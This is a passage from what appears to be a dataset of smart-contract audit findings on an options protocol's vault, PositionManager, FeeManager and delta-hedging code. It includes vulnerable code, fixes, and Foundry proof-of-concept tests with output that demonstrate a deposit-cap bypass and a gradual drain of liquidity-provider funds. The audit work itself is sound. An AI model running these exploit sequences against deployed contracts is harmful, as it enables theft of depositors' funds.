leverage computation can fail due to\\n decreased notional; in order to avoid this issue, we have to\\n also adjust (decrease) the premium in the burn flow.\\n */\\n position.leverage = (position.notionalUp // Add the line below\\n position.notionalDown) / position.premium;\\n }\\n\\n emit BuyDVP(tokenId, _positions[tokenId].expiry, params.notionalUp // Add the line below\\n params.notionalDown);\\n emit Buy(params.dvpAddr, _positions[tokenId].expiry, premium, params.recipient);\\n }\\n```\\nчIf the provided strike data does not match IG's current strike price, the user's minted position using `PositionManager` will be stuck and cannot be burned. 
This happens because when burn is called and `position.strike` is provided, it will revert as it cannot find the corresponding positions inside IG contract.\\nThis issue directly risking user's funds, consider a scenario where users mint a position near the end of the rolling epoch, providing the old epoch's current price. However, when the user's transaction is executed, the epoch is rolled and new epoch's current price is used, causing the mentioned issue to occur, and users' positions and funds will be stuck.ч```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n IDVP dvp = IDVP(params.dvpAddr);\\n\\n if (params.tokenId != 0) {\\n tokenId = params.tokenId;\\n ManagedPosition storage position = _positions[tokenId];\\n\\n if (ownerOf(tokenId) != msg.sender) {\\n revert NotOwner();\\n }\\n // Check token compatibility:\\n if (position.dvpAddr != params.dvpAddr || position.strike != params.strike) {\\n revert InvalidTokenID();\\n }\\n Epoch memory epoch = dvp.getEpoch();\\n if (position.expiry != epoch.current) {\\n revert PositionExpired();\\n }\\n }\\n if ((params.notionalUp > 0 && params.notionalDown > 0) && (params.notionalUp != params.notionalDown)) {\\n // If amount is a smile, it must be balanced:\\n revert AsymmetricAmount();\\n }\\n\\n uint256 obtainedPremium;\\n uint256 fee;\\n (obtainedPremium, fee) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n\\n // Transfer premium:\\n // NOTE: The PositionManager is just a middleman between the user and the DVP\\n IERC20 baseToken = IERC20(dvp.baseToken());\\n baseToken.safeTransferFrom(msg.sender, address(this), obtainedPremium);\\n\\n // Premium already include fee\\n baseToken.safeApprove(params.dvpAddr, obtainedPremium);\\n\\n==> premium = dvp.mint(\\n address(this),\\n params.strike,\\n params.notionalUp,\\n params.notionalDown,\\n params.expectedPremium,\\n params.maxSlippage,\\n 
params.nftAccessTokenId\\n );\\n\\n // // rest of code.\\n }\\n```\\n -Whenever swapPrice > oraclePrice, minting via PositionManager will revert, due to not enough funds being obtained from user.чmediumчIn `PositionManager::mint()`, `obtainedPremium` is calculated in a different way to the actual premium needed, and this will lead to a revert, denying service to users.\\nIn `PositionManager::mint()`, the PM gets `obtainedPremium` from DVP::premium():\\n```\\n(obtainedPremium, ) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n```\\n\\nThen the actual premium used when minting by the DVP is obtained via the following code:\\n\\nFrom the code above, we can see that the actual premium uses the greater of the two price options. However, `DVP::premium()` only uses the oracle price to determine the `obtainedPremium`.\\nThis leads to the opportunity for `premiumSwap > premiumOrac`, so in the PositionManager, `obtainedPremium` is less than the actual premium required to mint the position in the DVP contract.\\nThus, when the DVP contract tries to collect the premium from the PositionManager, it will revert due to insufficient balance in the PositionManager:\\n```\\nIERC20Metadata(baseToken).safeTransferFrom(msg.sender, vault, premium_ + vaultFee);\\n```\\nчWhen calculating `obtainedPremium`, consider also using the premium from `swapPrice` if it is greater than the premium calculated from `oraclePrice`.чWhenever `swapPrice > oraclePrice`, minting positions via the PositionManager will revert. 
This is a denial of service to users and this disruption of core protocol functionality can last extended periods of time.ч```\\n(obtainedPremium, ) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n```\\n -Transferring ERC20 Vault tokens to another address and then withdrawing from the vault breaks `totalDeposit` accounting which is tied to deposit addressesчmediumчVault inherits from the ERC20, so it has transfer functions to transfer vault shares. However, `totalDeposit` accounting is tied to addresses of users who deposited with the assumption that the same user will withdraw those shares. This means that any vault tokens transfer and then withdrawal from either user breaks the accounting of `totalDeposit`, allowing to either bypass the vault's max deposit limitation, or limit the vault from new deposits, by making it revert for exceeding the vault deposit limit even if the amount deposited is very small.\\n`Vault` inherits from ERC20:\\n```\\ncontract Vault is IVault, ERC20, EpochControls, AccessControl, Pausable {\\n```\\n\\nwhich has public `transfer` and `transferFrom` functions to `transfer` tokens to the other users, which any user can call:\\n```\\n function transfer(address to, uint256 amount) public virtual override returns (bool) {\\n address owner = _msgSender();\\n _transfer(owner, to, amount);\\n return true;\\n }\\n```\\n\\nIn order to limit the deposits to vault limit, vault has `maxDeposit` parameter set by admin. 
It is used to limit the deposits above this amount, reverting deposit transactions if exceeded:\\n```\\n // Avoids underflows when the maxDeposit is setted below than the totalDeposit\\n if (_state.liquidity.totalDeposit > maxDeposit) {\\n revert ExceedsMaxDeposit();\\n }\\n\\n if (amount > maxDeposit - _state.liquidity.totalDeposit) {\\n revert ExceedsMaxDeposit();\\n }\\n```\\n\\nIn order to correctly calculate the current vault deposits (_state.liquidity.totalDeposit), the vault uses the following:\\nVault tracks cumulative deposit for each user (depositReceipt.cumulativeAmount)\\nWhen user deposits, cumulative deposit and vault's `totalDeposit` increase by the amount of asset deposited\\nWhen user initiates withdrawal, both user's cumulative amount and `totalDeposit` are reduced by the percentage of cumulative amount, which is equal to perecentage of shares being withdrawn vs all shares user has.\\nThis process is necessary, because the share price changes between deposit and withdrawal, so it tracks only actual deposits, not amounts earned or lost due to vault's profit and loss.\\nAs can easily be seen, this withdrawal process assumes that users can't transfer their vault shares, because otherwise the withdrawal from the user who never deposited but got shares will not reduce `totalDeposit`, and user who transferred the shares away and then withdraws all remaining shares will reduce `totalDeposit` by a large amount, while the amount withdrawn is actually much smaller.\\nHowever, since `Vault` is a normal `ERC20` token, users can freely transfer vault shares to each other, breaking this assumption. This leads to 2 scenarios:\\nIt's easily possible to bypass vault deposit cap: 1.1. Alice deposits up to max deposit cap (say, 1M USDC) 1.2. Alice transfers all shares except 1 wei to Bob 1.3. Alice withdraws 1 wei share. This reduces `totalDeposit` by full Alice deposited amount (1M USDC), but only 1 wei share is withdrawn, basically 0 assets withdrawn. 1.4. 
Alice deposits 1M USDC again (now the total deposited into the vault is 2M, already breaking the cap of 1M).\\nIt's easily possible to lock the vault from further deposits even though the vault might have small amount (or even 0) assets deposited. 2.1. Alice deposits up to max deposit cap (say, 1M USDC) 2.2. Alice transfers all shares except 1 wei to Bob 2.3. Bob withdraws all shares. Since Bob didn't deposit previously, this doesn't reduce `totalDeposit` at all, but withdraws all 1M USDC to Bob. At this point `totalDeposit` = 1M USDC, but vault has 0 assets in it and no further deposits are accepted due to `maxDeposit` limit.чEither disallow transferring of vault shares or track vault assets instead of deposits. Alternatively, re-design the withdrawal system (for example, throw out cumulative deposit calculation and simply calculate total assets and total shares and when withdrawing - reduce `totalDeposit` by the sharesWithdrawn / totalShares * totalDeposit)чImportant security measure of vault max deposit limit can be bypassed, potentially losing funds for the users when the admin doesn't want to accept large amounts for various reasons (like testing something).\\nIt's possible to lock vault from deposits by inflating the `totalDeposit` without vault having actual assets, rendering the operations useless due to lack of liquidity and lack of ability to deposit. 
Even if `maxDeposit` is increased, `totalDeposit` can be inflated again, breaking protocol core functioning.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from \"forge-std/Test.sol\";\\nimport {console} from \"forge-std/console.sol\";\\nimport {UD60x18, ud, convert} from \"@prb/math/UD60x18.sol\";\\n\\nimport {IERC20} from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport {IPositionManager} from \"@project/interfaces/IPositionManager.sol\";\\nimport {Epoch} from \"@project/lib/EpochController.sol\";\\nimport {AmountsMath} from \"@project/lib/AmountsMath.sol\";\\nimport {EpochFrequency} from \"@project/lib/EpochFrequency.sol\";\\nimport {OptionStrategy} from \"@project/lib/OptionStrategy.sol\";\\nimport {AddressProvider} from \"@project/AddressProvider.sol\";\\nimport {MarketOracle} from \"@project/MarketOracle.sol\";\\nimport {FeeManager} from \"@project/FeeManager.sol\";\\nimport {Vault} from \"@project/Vault.sol\";\\nimport {TestnetToken} from \"@project/testnet/TestnetToken.sol\";\\nimport {TestnetPriceOracle} from \"@project/testnet/TestnetPriceOracle.sol\";\\nimport {DVPUtils} from \"./utils/DVPUtils.sol\";\\nimport {TokenUtils} from \"./utils/TokenUtils.sol\";\\nimport {Utils} from \"./utils/Utils.sol\";\\nimport {VaultUtils} from \"./utils/VaultUtils.sol\";\\nimport {MockedIG} from \"./mock/MockedIG.sol\";\\nimport {MockedRegistry} from \"./mock/MockedRegistry.sol\";\\nimport {MockedVault} from \"./mock/MockedVault.sol\";\\nimport {TestnetSwapAdapter} from \"@project/testnet/TestnetSwapAdapter.sol\";\\nimport {PositionManager} from \"@project/periphery/PositionManager.sol\";\\n\\n\\ncontract IGVaultTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n 
AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.DAILY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n function testVaultDepositLimitBypass() public {\\n _strike = 1e18;\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipDay(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n (,,,,uint totalDeposit,,,,) = vault.vaultState();\\n console.log(\"total deposits\", totalDeposit);\\n\\n vm.startPrank(alice);\\n 
vault.redeem(1e18);\\n vault.transfer(address(charlie), 1e18-1);\\n vault.initiateWithdraw(1);\\n vm.stopPrank();\\n\\n VaultUtils.logState(vault);\\n (,,,,totalDeposit,,,,) = vault.vaultState();\\n console.log(\"total deposits\", totalDeposit);\\n\\n }\\n}\\n```\\n\\nExecution console:\\n```\\n current epoch 1698566400\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n dead false\\n lockedInitially 2000000000000000000\\n pendingDeposits 0\\n pendingWithdrawals 0\\n pendingPayoffs 0\\n heldShares 0\\n newHeldShares 0\\n base token notional 1000000000000000000\\n side token notional 1000000000000000000\\n ----------------------------------------\\n total deposits 2000000000000000000\\n current epoch 1698566400\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n dead false\\n lockedInitially 2000000000000000000\\n pendingDeposits 0\\n pendingWithdrawals 0\\n pendingPayoffs 0\\n heldShares 0\\n newHeldShares 1\\n base token notional 1000000000000000000\\n side token notional 1000000000000000000\\n ----------------------------------------\\n total deposits 1000000000000000000\\n```\\n\\nNotice:\\nDemonstrates vault deposit limit bypass\\nVault has total assets of 2, but the total deposits is 1, allowing further deposits.ч```\\ncontract Vault is IVault, ERC20, EpochControls, AccessControl, Pausable {\\n```\\n -PositionManager will revert when trying to return back to user excess of the premium transferred from the user when minting positionчmediumч`PositionManager.mint` calculates preliminary premium to be paid for buying the option and transfers it from the user. The actual premium paid may differ, and if it's smaller, excess is returned back to user. 
However, it is returned using the safeTransferFrom:\\n```\\n if (obtainedPremium > premium) {\\n baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);\\n }\\n```\\n\\nThe problem is that `PositionManager` doesn't approve itself to transfer baseToken to `msg.sender`, and USDC `transferFrom` implementation requires approval even if address is transferring from its own address. Thus the transfer will revert and user will be unable to open position.\\n```\\n function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {\\n _transfer(sender, recipient, amount);\\n _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, \"ERC20: transfer amount exceeds allowance\"));\\n return true;\\n }\\n```\\n\\n```\\n function transferFrom(\\n address from,\\n address to,\\n uint256 value\\n )\\n external\\n override\\n whenNotPaused\\n notBlacklisted(msg.sender)\\n notBlacklisted(from)\\n notBlacklisted(to)\\n returns (bool)\\n {\\n require(\\n value <= allowed[from][msg.sender],\\n \"ERC20: transfer amount exceeds allowance\"\\n );\\n _transfer(from, to, value);\\n allowed[from][msg.sender] = allowed[from][msg.sender].sub(value);\\n return true;\\n }\\n```\\n\\n`PositionManager` doesn't approve itself to do transfers anywhere, so `baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);` will always revert, preventing the user from opening position via `PositionManager`, breaking important protocol function.чConsider using `safeTransfer` instead of `safeTransferFrom` when transferring token from self.чUser is unable to open positions via `PositionManager` in certain situations as all such transactions will revert, breaking important protocol functionality and potentially losing user funds / profit due to failure to open position.ч```\\n if (obtainedPremium > premium) {\\n baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);\\n 
}\\n```\\n -FeeManager `receiveFee` and `trackVaultFee` functions allow anyone to call it with user-provided dvp/vault address and add any arbitrary feeAmount to any address, breaking fees accounting and temporarily bricking DVP smart contractчmediumч`FeeManager` uses `trackVaultFee` function to account vault fees. The problem is that this function can be called by any smart contract implementing `vault()` function (there are no address or role authentication), thus malicious user can break all vault fees accounting by randomly inflating existing vault's fees, making it hard/impossible for admins to determine the real split of fees between vaults. Moreover, malicious user can provide such `feeAmount` to `trackVaultFee` function, which will increase any vault's fee to `uint256.max` value, meaning all following calls to `trackVaultFee` will revert due to fee addition overflow, temporarily bricking DVP smart contract, which calls `trackVaultFee` on all mints and burns, which will always revert until `FeeManager` smart contract is updated to a new address in `AddressProvider`.\\nSimilarly, `receiveFee` function is used to account fee amounts received by different addresses (dvp), which can later be withdrawn by admin via `withdrawFee` function. The problem is that any smart contract implementing `baseToken()` function can call it, thus any malicious user can break all accounting by adding arbitrary amounts to their addresses without actually paying anything. 
Once some addresses fees are inflated, it will be difficult for admins to track fee amounts which are real, and which are from fake dvps and fake tokens.\\n`FeeManager.trackVaultFee` function has no role/address check:\\n```\\n function trackVaultFee(address vault, uint256 feeAmount) external {\\n // Check sender:\\n IDVP dvp = IDVP(msg.sender);\\n if (vault != dvp.vault()) {\\n revert WrongVault();\\n }\\n\\n vaultFeeAmounts[vault] += feeAmount;\\n\\n emit TransferVaultFee(vault, feeAmount);\\n }\\n```\\n\\nAny smart contract implementing `vault()` function can call it. The vault address returned can be any address, thus user can inflate vault fees both for existing real vaults, and for any addresses user chooses. This totally breaks all vault fees accounting.\\n`FeeManager.receiveFee` function has no role/address check either:\\n```\\n function receiveFee(uint256 feeAmount) external {\\n _getBaseTokenInfo(msg.sender).safeTransferFrom(msg.sender, address(this), feeAmount);\\n senders[msg.sender] += feeAmount;\\n\\n emit ReceiveFee(msg.sender, feeAmount);\\n }\\n// rest of code\\n function _getBaseTokenInfo(address sender) internal view returns (IERC20Metadata token) {\\n token = IERC20Metadata(IVaultParams(sender).baseToken());\\n }\\n```\\n\\nAny smart contract crafted by malicious user can call it. It just has to return base token, which can also be token created by the user. After transfering this fake base token, the `receiveFee` function will increase user's fee balance as if it was real token transferred.чConsider adding a whitelist of addresses which can call these functions.чMalicious users can break all fee and vault fee accounting by inflating existing vaults or user addresses fees earned without actually paying these fees, making it hard/impossible for admins to determine the actual fees earned from each vault or dvp. 
Moreover, malicious user can temporarily brick DVP smart contract by inflating vault's accounted fees to `uint256.max`, thus making all DVP mints and burns (which call trackVaultFee) revert.ч```\\n function trackVaultFee(address vault, uint256 feeAmount) external {\\n // Check sender:\\n IDVP dvp = IDVP(msg.sender);\\n if (vault != dvp.vault()) {\\n revert WrongVault();\\n }\\n\\n vaultFeeAmounts[vault] += feeAmount;\\n\\n emit TransferVaultFee(vault, feeAmount);\\n }\\n```\\n -Trading out of the money options has delta = 0 which breaks protocol assumptions of traders profit being fully hedged and can result in a loss of funds to LPsчmediumчSmilee protocol fully hedges all traders pnl by re-balancing the vault between base and side tokens after each trade. This is the assumption about this from the docs:\\nIn the other words, any profit for traders is taken from the hedge and not from the vault Liquidity Providers funds. LP payoff must be at least the underlying DEX (Uniswap) payoff without fees with the same settings.\\nHowever, out of the money options (IG Bull when `price < strike` or IG Bear when price > strike) have `delta = 0`, meaning that trading such options doesn't influence vault re-balancing. Since the price of these options changes depending on current asset price, any profit gained by traders from these trades is not hedged and thus becomes the loss of the vault LPs, breaking the assumption referenced above.\\nAs a result, LPs payout can becomes less than underlying DEX LPs payout without fees. And in extreme cases the vault funds might not be enough to cover traders payoff.\\nWhen the vault delta hedges its position after each trade, it only hedges in the money options, ignoring any out of the money options. 
For example, this is the calculation of the IG Bull delta (s is the current asset price, `k` is the strike):\\n```\\n /**\\n Δ_bull = (1 / θ) * F\\n F = {\\n@@@ * 0 if (S < K)\\n * (1 - √(K / Kb)) / K if (S > Kb)\\n * 1 / K - 1 / √(S * K) if (K < S < Kb)\\n }\\n */\\n function bullDelta(uint256 k, uint256 kB, uint256 s, uint256 theta) internal pure returns (int256) {\\n SD59x18 delta;\\n if (s <= k) {\\n@@@ return 0;\\n }\\n```\\n\\nThis is example scenario to demonstrate the issue:\\nstrike = 1\\nvault has deposits = 2 (base = 1, side = 1), available liquidity: bull = 1, bear = 1\\ntrader buys 1 IG bear. This ensures that no vault re-balance happens when `price < strike`\\nprice drops to 0.9. Trader buys 1 IG bull (premium paid = 0.000038)\\nprice raises to 0.99. Trader sells 1 IG bull (premium received = 0.001138). Trader profit = 0.0011\\nprice is back to 1. Trader sells back 1 IG bear.\\nat this point the vault has (base = 0.9989, side = 1), meaning LPs have lost some funds when the price = strike.\\nWhile the damage from 1 trade is not large, if this is repeated several times, the damage to LP funds will keep inceasing.\\nThis can be especially dangerous if very long dated expiries are used, for example annual IG options. If the asset price remains below the strike for most of the time and IG Bear liquidity is close to 100% usage, then all IG Bull trades will be unhedged, thus breaking the core protocol assumption that traders profit should not translate to LPs loss: in such case traders profit will be the same loss for LPs. In extreme volatility, if price drops by 50% then recovers, traders can profit 3% of the vault with each trade, so after 33 trades the vault will be fully drained.чThe issue seems to be from the approximation of the delta for OTM options. Statistically, long-term, the issue shouldn't be a problem as the long-term expectation is positive for the LPs profit due to it. 
However, short-term, the traders profit can create issues, and this seems to be the protocol's core assumption. Possible solution can include more precise delta calculation, maybe still approximation, but slightly more precise than the current approximation used.\\nAlternatively, keep track of underlying DEX equivalent of LP payoff at the current price and if, after the trade, vault's notional is less than that, add fee = the difference, to ensure that the assumption above is always true (similar to how underlying DEX slippage is added as a fee).чIn some specific trading conditions (IG Bear liquidity used close to 100% if price < strike, or IG Bull liquidity used close to 100% if price > strike), all or most of the traders pnl is not hedged and thus becomes loss or profit of the LPs, breaking the core protocol assumptions about hedging and in extreme cases can drain significant percentage of the vault (LPs) funds, up to a point of not being able to payout traders payoff.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from \"forge-std/Test.sol\";\\nimport {console} from \"forge-std/console.sol\";\\nimport {UD60x18, ud, convert} from \"@prb/math/UD60x18.sol\";\\n\\nimport {IERC20} from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport {IPositionManager} from \"@project/interfaces/IPositionManager.sol\";\\nimport {Epoch} from \"@project/lib/EpochController.sol\";\\nimport {AmountsMath} from \"@project/lib/AmountsMath.sol\";\\nimport {EpochFrequency} from \"@project/lib/EpochFrequency.sol\";\\nimport {OptionStrategy} from \"@project/lib/OptionStrategy.sol\";\\nimport {AddressProvider} from \"@project/AddressProvider.sol\";\\nimport {MarketOracle} from \"@project/MarketOracle.sol\";\\nimport {FeeManager} from \"@project/FeeManager.sol\";\\nimport {Vault} from \"@project/Vault.sol\";\\nimport {TestnetToken} from \"@project/testnet/TestnetToken.sol\";\\nimport 
{TestnetPriceOracle} from \"@project/testnet/TestnetPriceOracle.sol\";\\nimport {DVPUtils} from \"./utils/DVPUtils.sol\";\\nimport {TokenUtils} from \"./utils/TokenUtils.sol\";\\nimport {Utils} from \"./utils/Utils.sol\";\\nimport {VaultUtils} from \"./utils/VaultUtils.sol\";\\nimport {MockedIG} from \"./mock/MockedIG.sol\";\\nimport {MockedRegistry} from \"./mock/MockedRegistry.sol\";\\nimport {MockedVault} from \"./mock/MockedVault.sol\";\\nimport {TestnetSwapAdapter} from \"@project/testnet/TestnetSwapAdapter.sol\";\\nimport {PositionManager} from \"@project/periphery/PositionManager.sol\";\\n\\n\\ncontract IGTradeTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.WEEKLY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n 
ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n // try to buy/sell ig bull below strike for user's profit\\n // this will not be hedged, and thus the vault should lose funds\\n function test() public {\\n _strike = 1e18;\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), _strike);\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipWeek(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n DVPUtils.debugState(ig);\\n\\n // to ensure no rebalance from price movement\\n console.log(\"Buy 100% IG BEAR @ 1.0\");\\n testBuyOption(1e18, 0, 1e18);\\n\\n for (uint i = 0; i < 20; i++) {\\n // price moves down, we buy\\n vm.warp(block.timestamp + 1 hours);\\n console.log(\"Buy 100% IG BULL @ 0.9\");\\n testBuyOption(0.9e18, 1e18, 0);\\n\\n // price moves up, we sell\\n vm.warp(block.timestamp + 1 hours);\\n console.log(\"Sell 100% IG BULL @ 0.99\");\\n testSellOption(0.99e18, 1e18, 0);\\n }\\n\\n // sell back original\\n console.log(\"Sell 100% IG BEAR @ 1.0\");\\n testSellOption(1e18, 0, 1e18);\\n }\\n\\n function testBuyOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n (uint256 premium, uint256 fee) = _assurePremium(charlie, _strike, optionAmountUp, optionAmountDown);\\n\\n vm.startPrank(charlie);\\n premium = ig.mint(charlie, _strike, optionAmountUp, optionAmountDown, premium, 10e18, 0);\\n 
vm.stopPrank();\\n\\n console.log(\"premium\", premium);\\n (uint256 btAmount, uint256 stAmount) = vault.balances();\\n console.log(\"base token notional\", btAmount);\\n console.log(\"side token notional\", stAmount);\\n }\\n\\n function testSellOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n uint256 charliePayoff;\\n uint256 charliePayoffFee;\\n {\\n vm.startPrank(charlie);\\n (charliePayoff, charliePayoffFee) = ig.payoff(\\n ig.currentEpoch(),\\n _strike,\\n optionAmountUp,\\n optionAmountDown\\n );\\n\\n charliePayoff = ig.burn(\\n ig.currentEpoch(),\\n charlie,\\n _strike,\\n optionAmountUp,\\n optionAmountDown,\\n charliePayoff,\\n 0.1e18\\n );\\n vm.stopPrank();\\n\\n console.log(\"payoff received\", charliePayoff);\\n (uint256 btAmount, uint256 stAmount) = vault.balances();\\n console.log(\"base token notional\", btAmount);\\n console.log(\"side token notional\", stAmount);\\n }\\n }\\n\\n function _assurePremium(\\n address user,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown\\n ) private returns (uint256 premium_, uint256 fee) {\\n (premium_, fee) = ig.premium(strike, amountUp, amountDown);\\n TokenUtils.provideApprovedTokens(admin, address(baseToken), user, address(ig), premium_*5, vm);\\n }\\n}\\n```\\n\\nExecution console:\\n```\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n dead false\\n lockedInitially 2000000000000000000\\n// rest of code\\n Buy 100% IG BEAR @ 1.0\\n premium 6140201098441368\\n base token notional 1006140201098441412\\n side token notional 999999999999999956\\n Buy 100% IG BULL @ 0.9\\n premium 3853262173300493\\n base token notional 1009993463271741905\\n side token notional 999999999999999956\\n Sell 100% IG BULL @ 0.99\\n payoff received 4865770659690694\\n base token notional 1005127692612051211\\n side token notional 999999999999999956\\n// rest of code\\n Buy 
100% IG BULL @ 0.9\\n premium 1827837493502948\\n base token notional 984975976168184269\\n side token notional 999999999999999956\\n Sell 100% IG BULL @ 0.99\\n payoff received 3172781130161218\\n base token notional 981803195038023051\\n side token notional 999999999999999956\\n Sell 100% IG BEAR @ 1.0\\n payoff received 3269654020920760\\n base token notional 978533541017102291\\n side token notional 999999999999999956\\n```\\n\\nNotice:\\nInitial vault balance at the asset price of 1.0 is base = 1, side = 1\\nAll IG Bull trades do not change vault side token balance (no re-balancing happens)\\nAfter 20 trades, at the asset price of 1.0, base = 0.9785, side = 1\\nThis means that 20 profitable trades create a 1.07% loss for the vault. Similar scenario for annual options with 50% price move shows 3% vault loss per trade.ч```\\n /**\\n Δ_bull = (1 / θ) * F\\n F = {\\n@@@ * 0 if (S < K)\\n * (1 - √(K / Kb)) / K if (S > Kb)\\n * 1 / K - 1 / √(S * K) if (K < S < Kb)\\n }\\n */\\n function bullDelta(uint256 k, uint256 kB, uint256 s, uint256 theta) internal pure returns (int256) {\\n SD59x18 delta;\\n if (s <= k) {\\n@@@ return 0;\\n }\\n```\\n -If the vault's side token balance is 0 or a tiny amount, then most if not all IG Bear trades will revert due to incorrect check of computation error during delta hedge amount calculationчmediumчWhen delta hedge amount is calculated in `FinanceIGDelta.deltaHedgeAmount`, the last step is to verify that delta hedge amount to sell is slightly more than vault's side token due to computation error. 
The check is the following:\\n```\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n\\nThe check works correctly most of the time, but if the vault's side token (params.sideTokensAmount) is 0 or close to it, then the check will always fail, because `0 / 10000 = 0` and an unsigned amount cannot be less than 0. This means that even a tiny amount to sell (like 1 wei) will revert the transaction if the vault has 0 side tokens.\\nVault's side token is 0 when:\\nthe current price trades above high boundary (Kb)\\nand IG Bull used liquidity equals 0\\nIn such a situation, any IG bear trade doesn't impact hedge amount, but due to computation error will almost always result in tiny but non-0 side token amount to sell value, which will revert due to the incorrect comparison described above.чPossibly check both relative (sideToken / 10000) and absolute (e.g. 1000 or side token UNIT / 10000) value. 
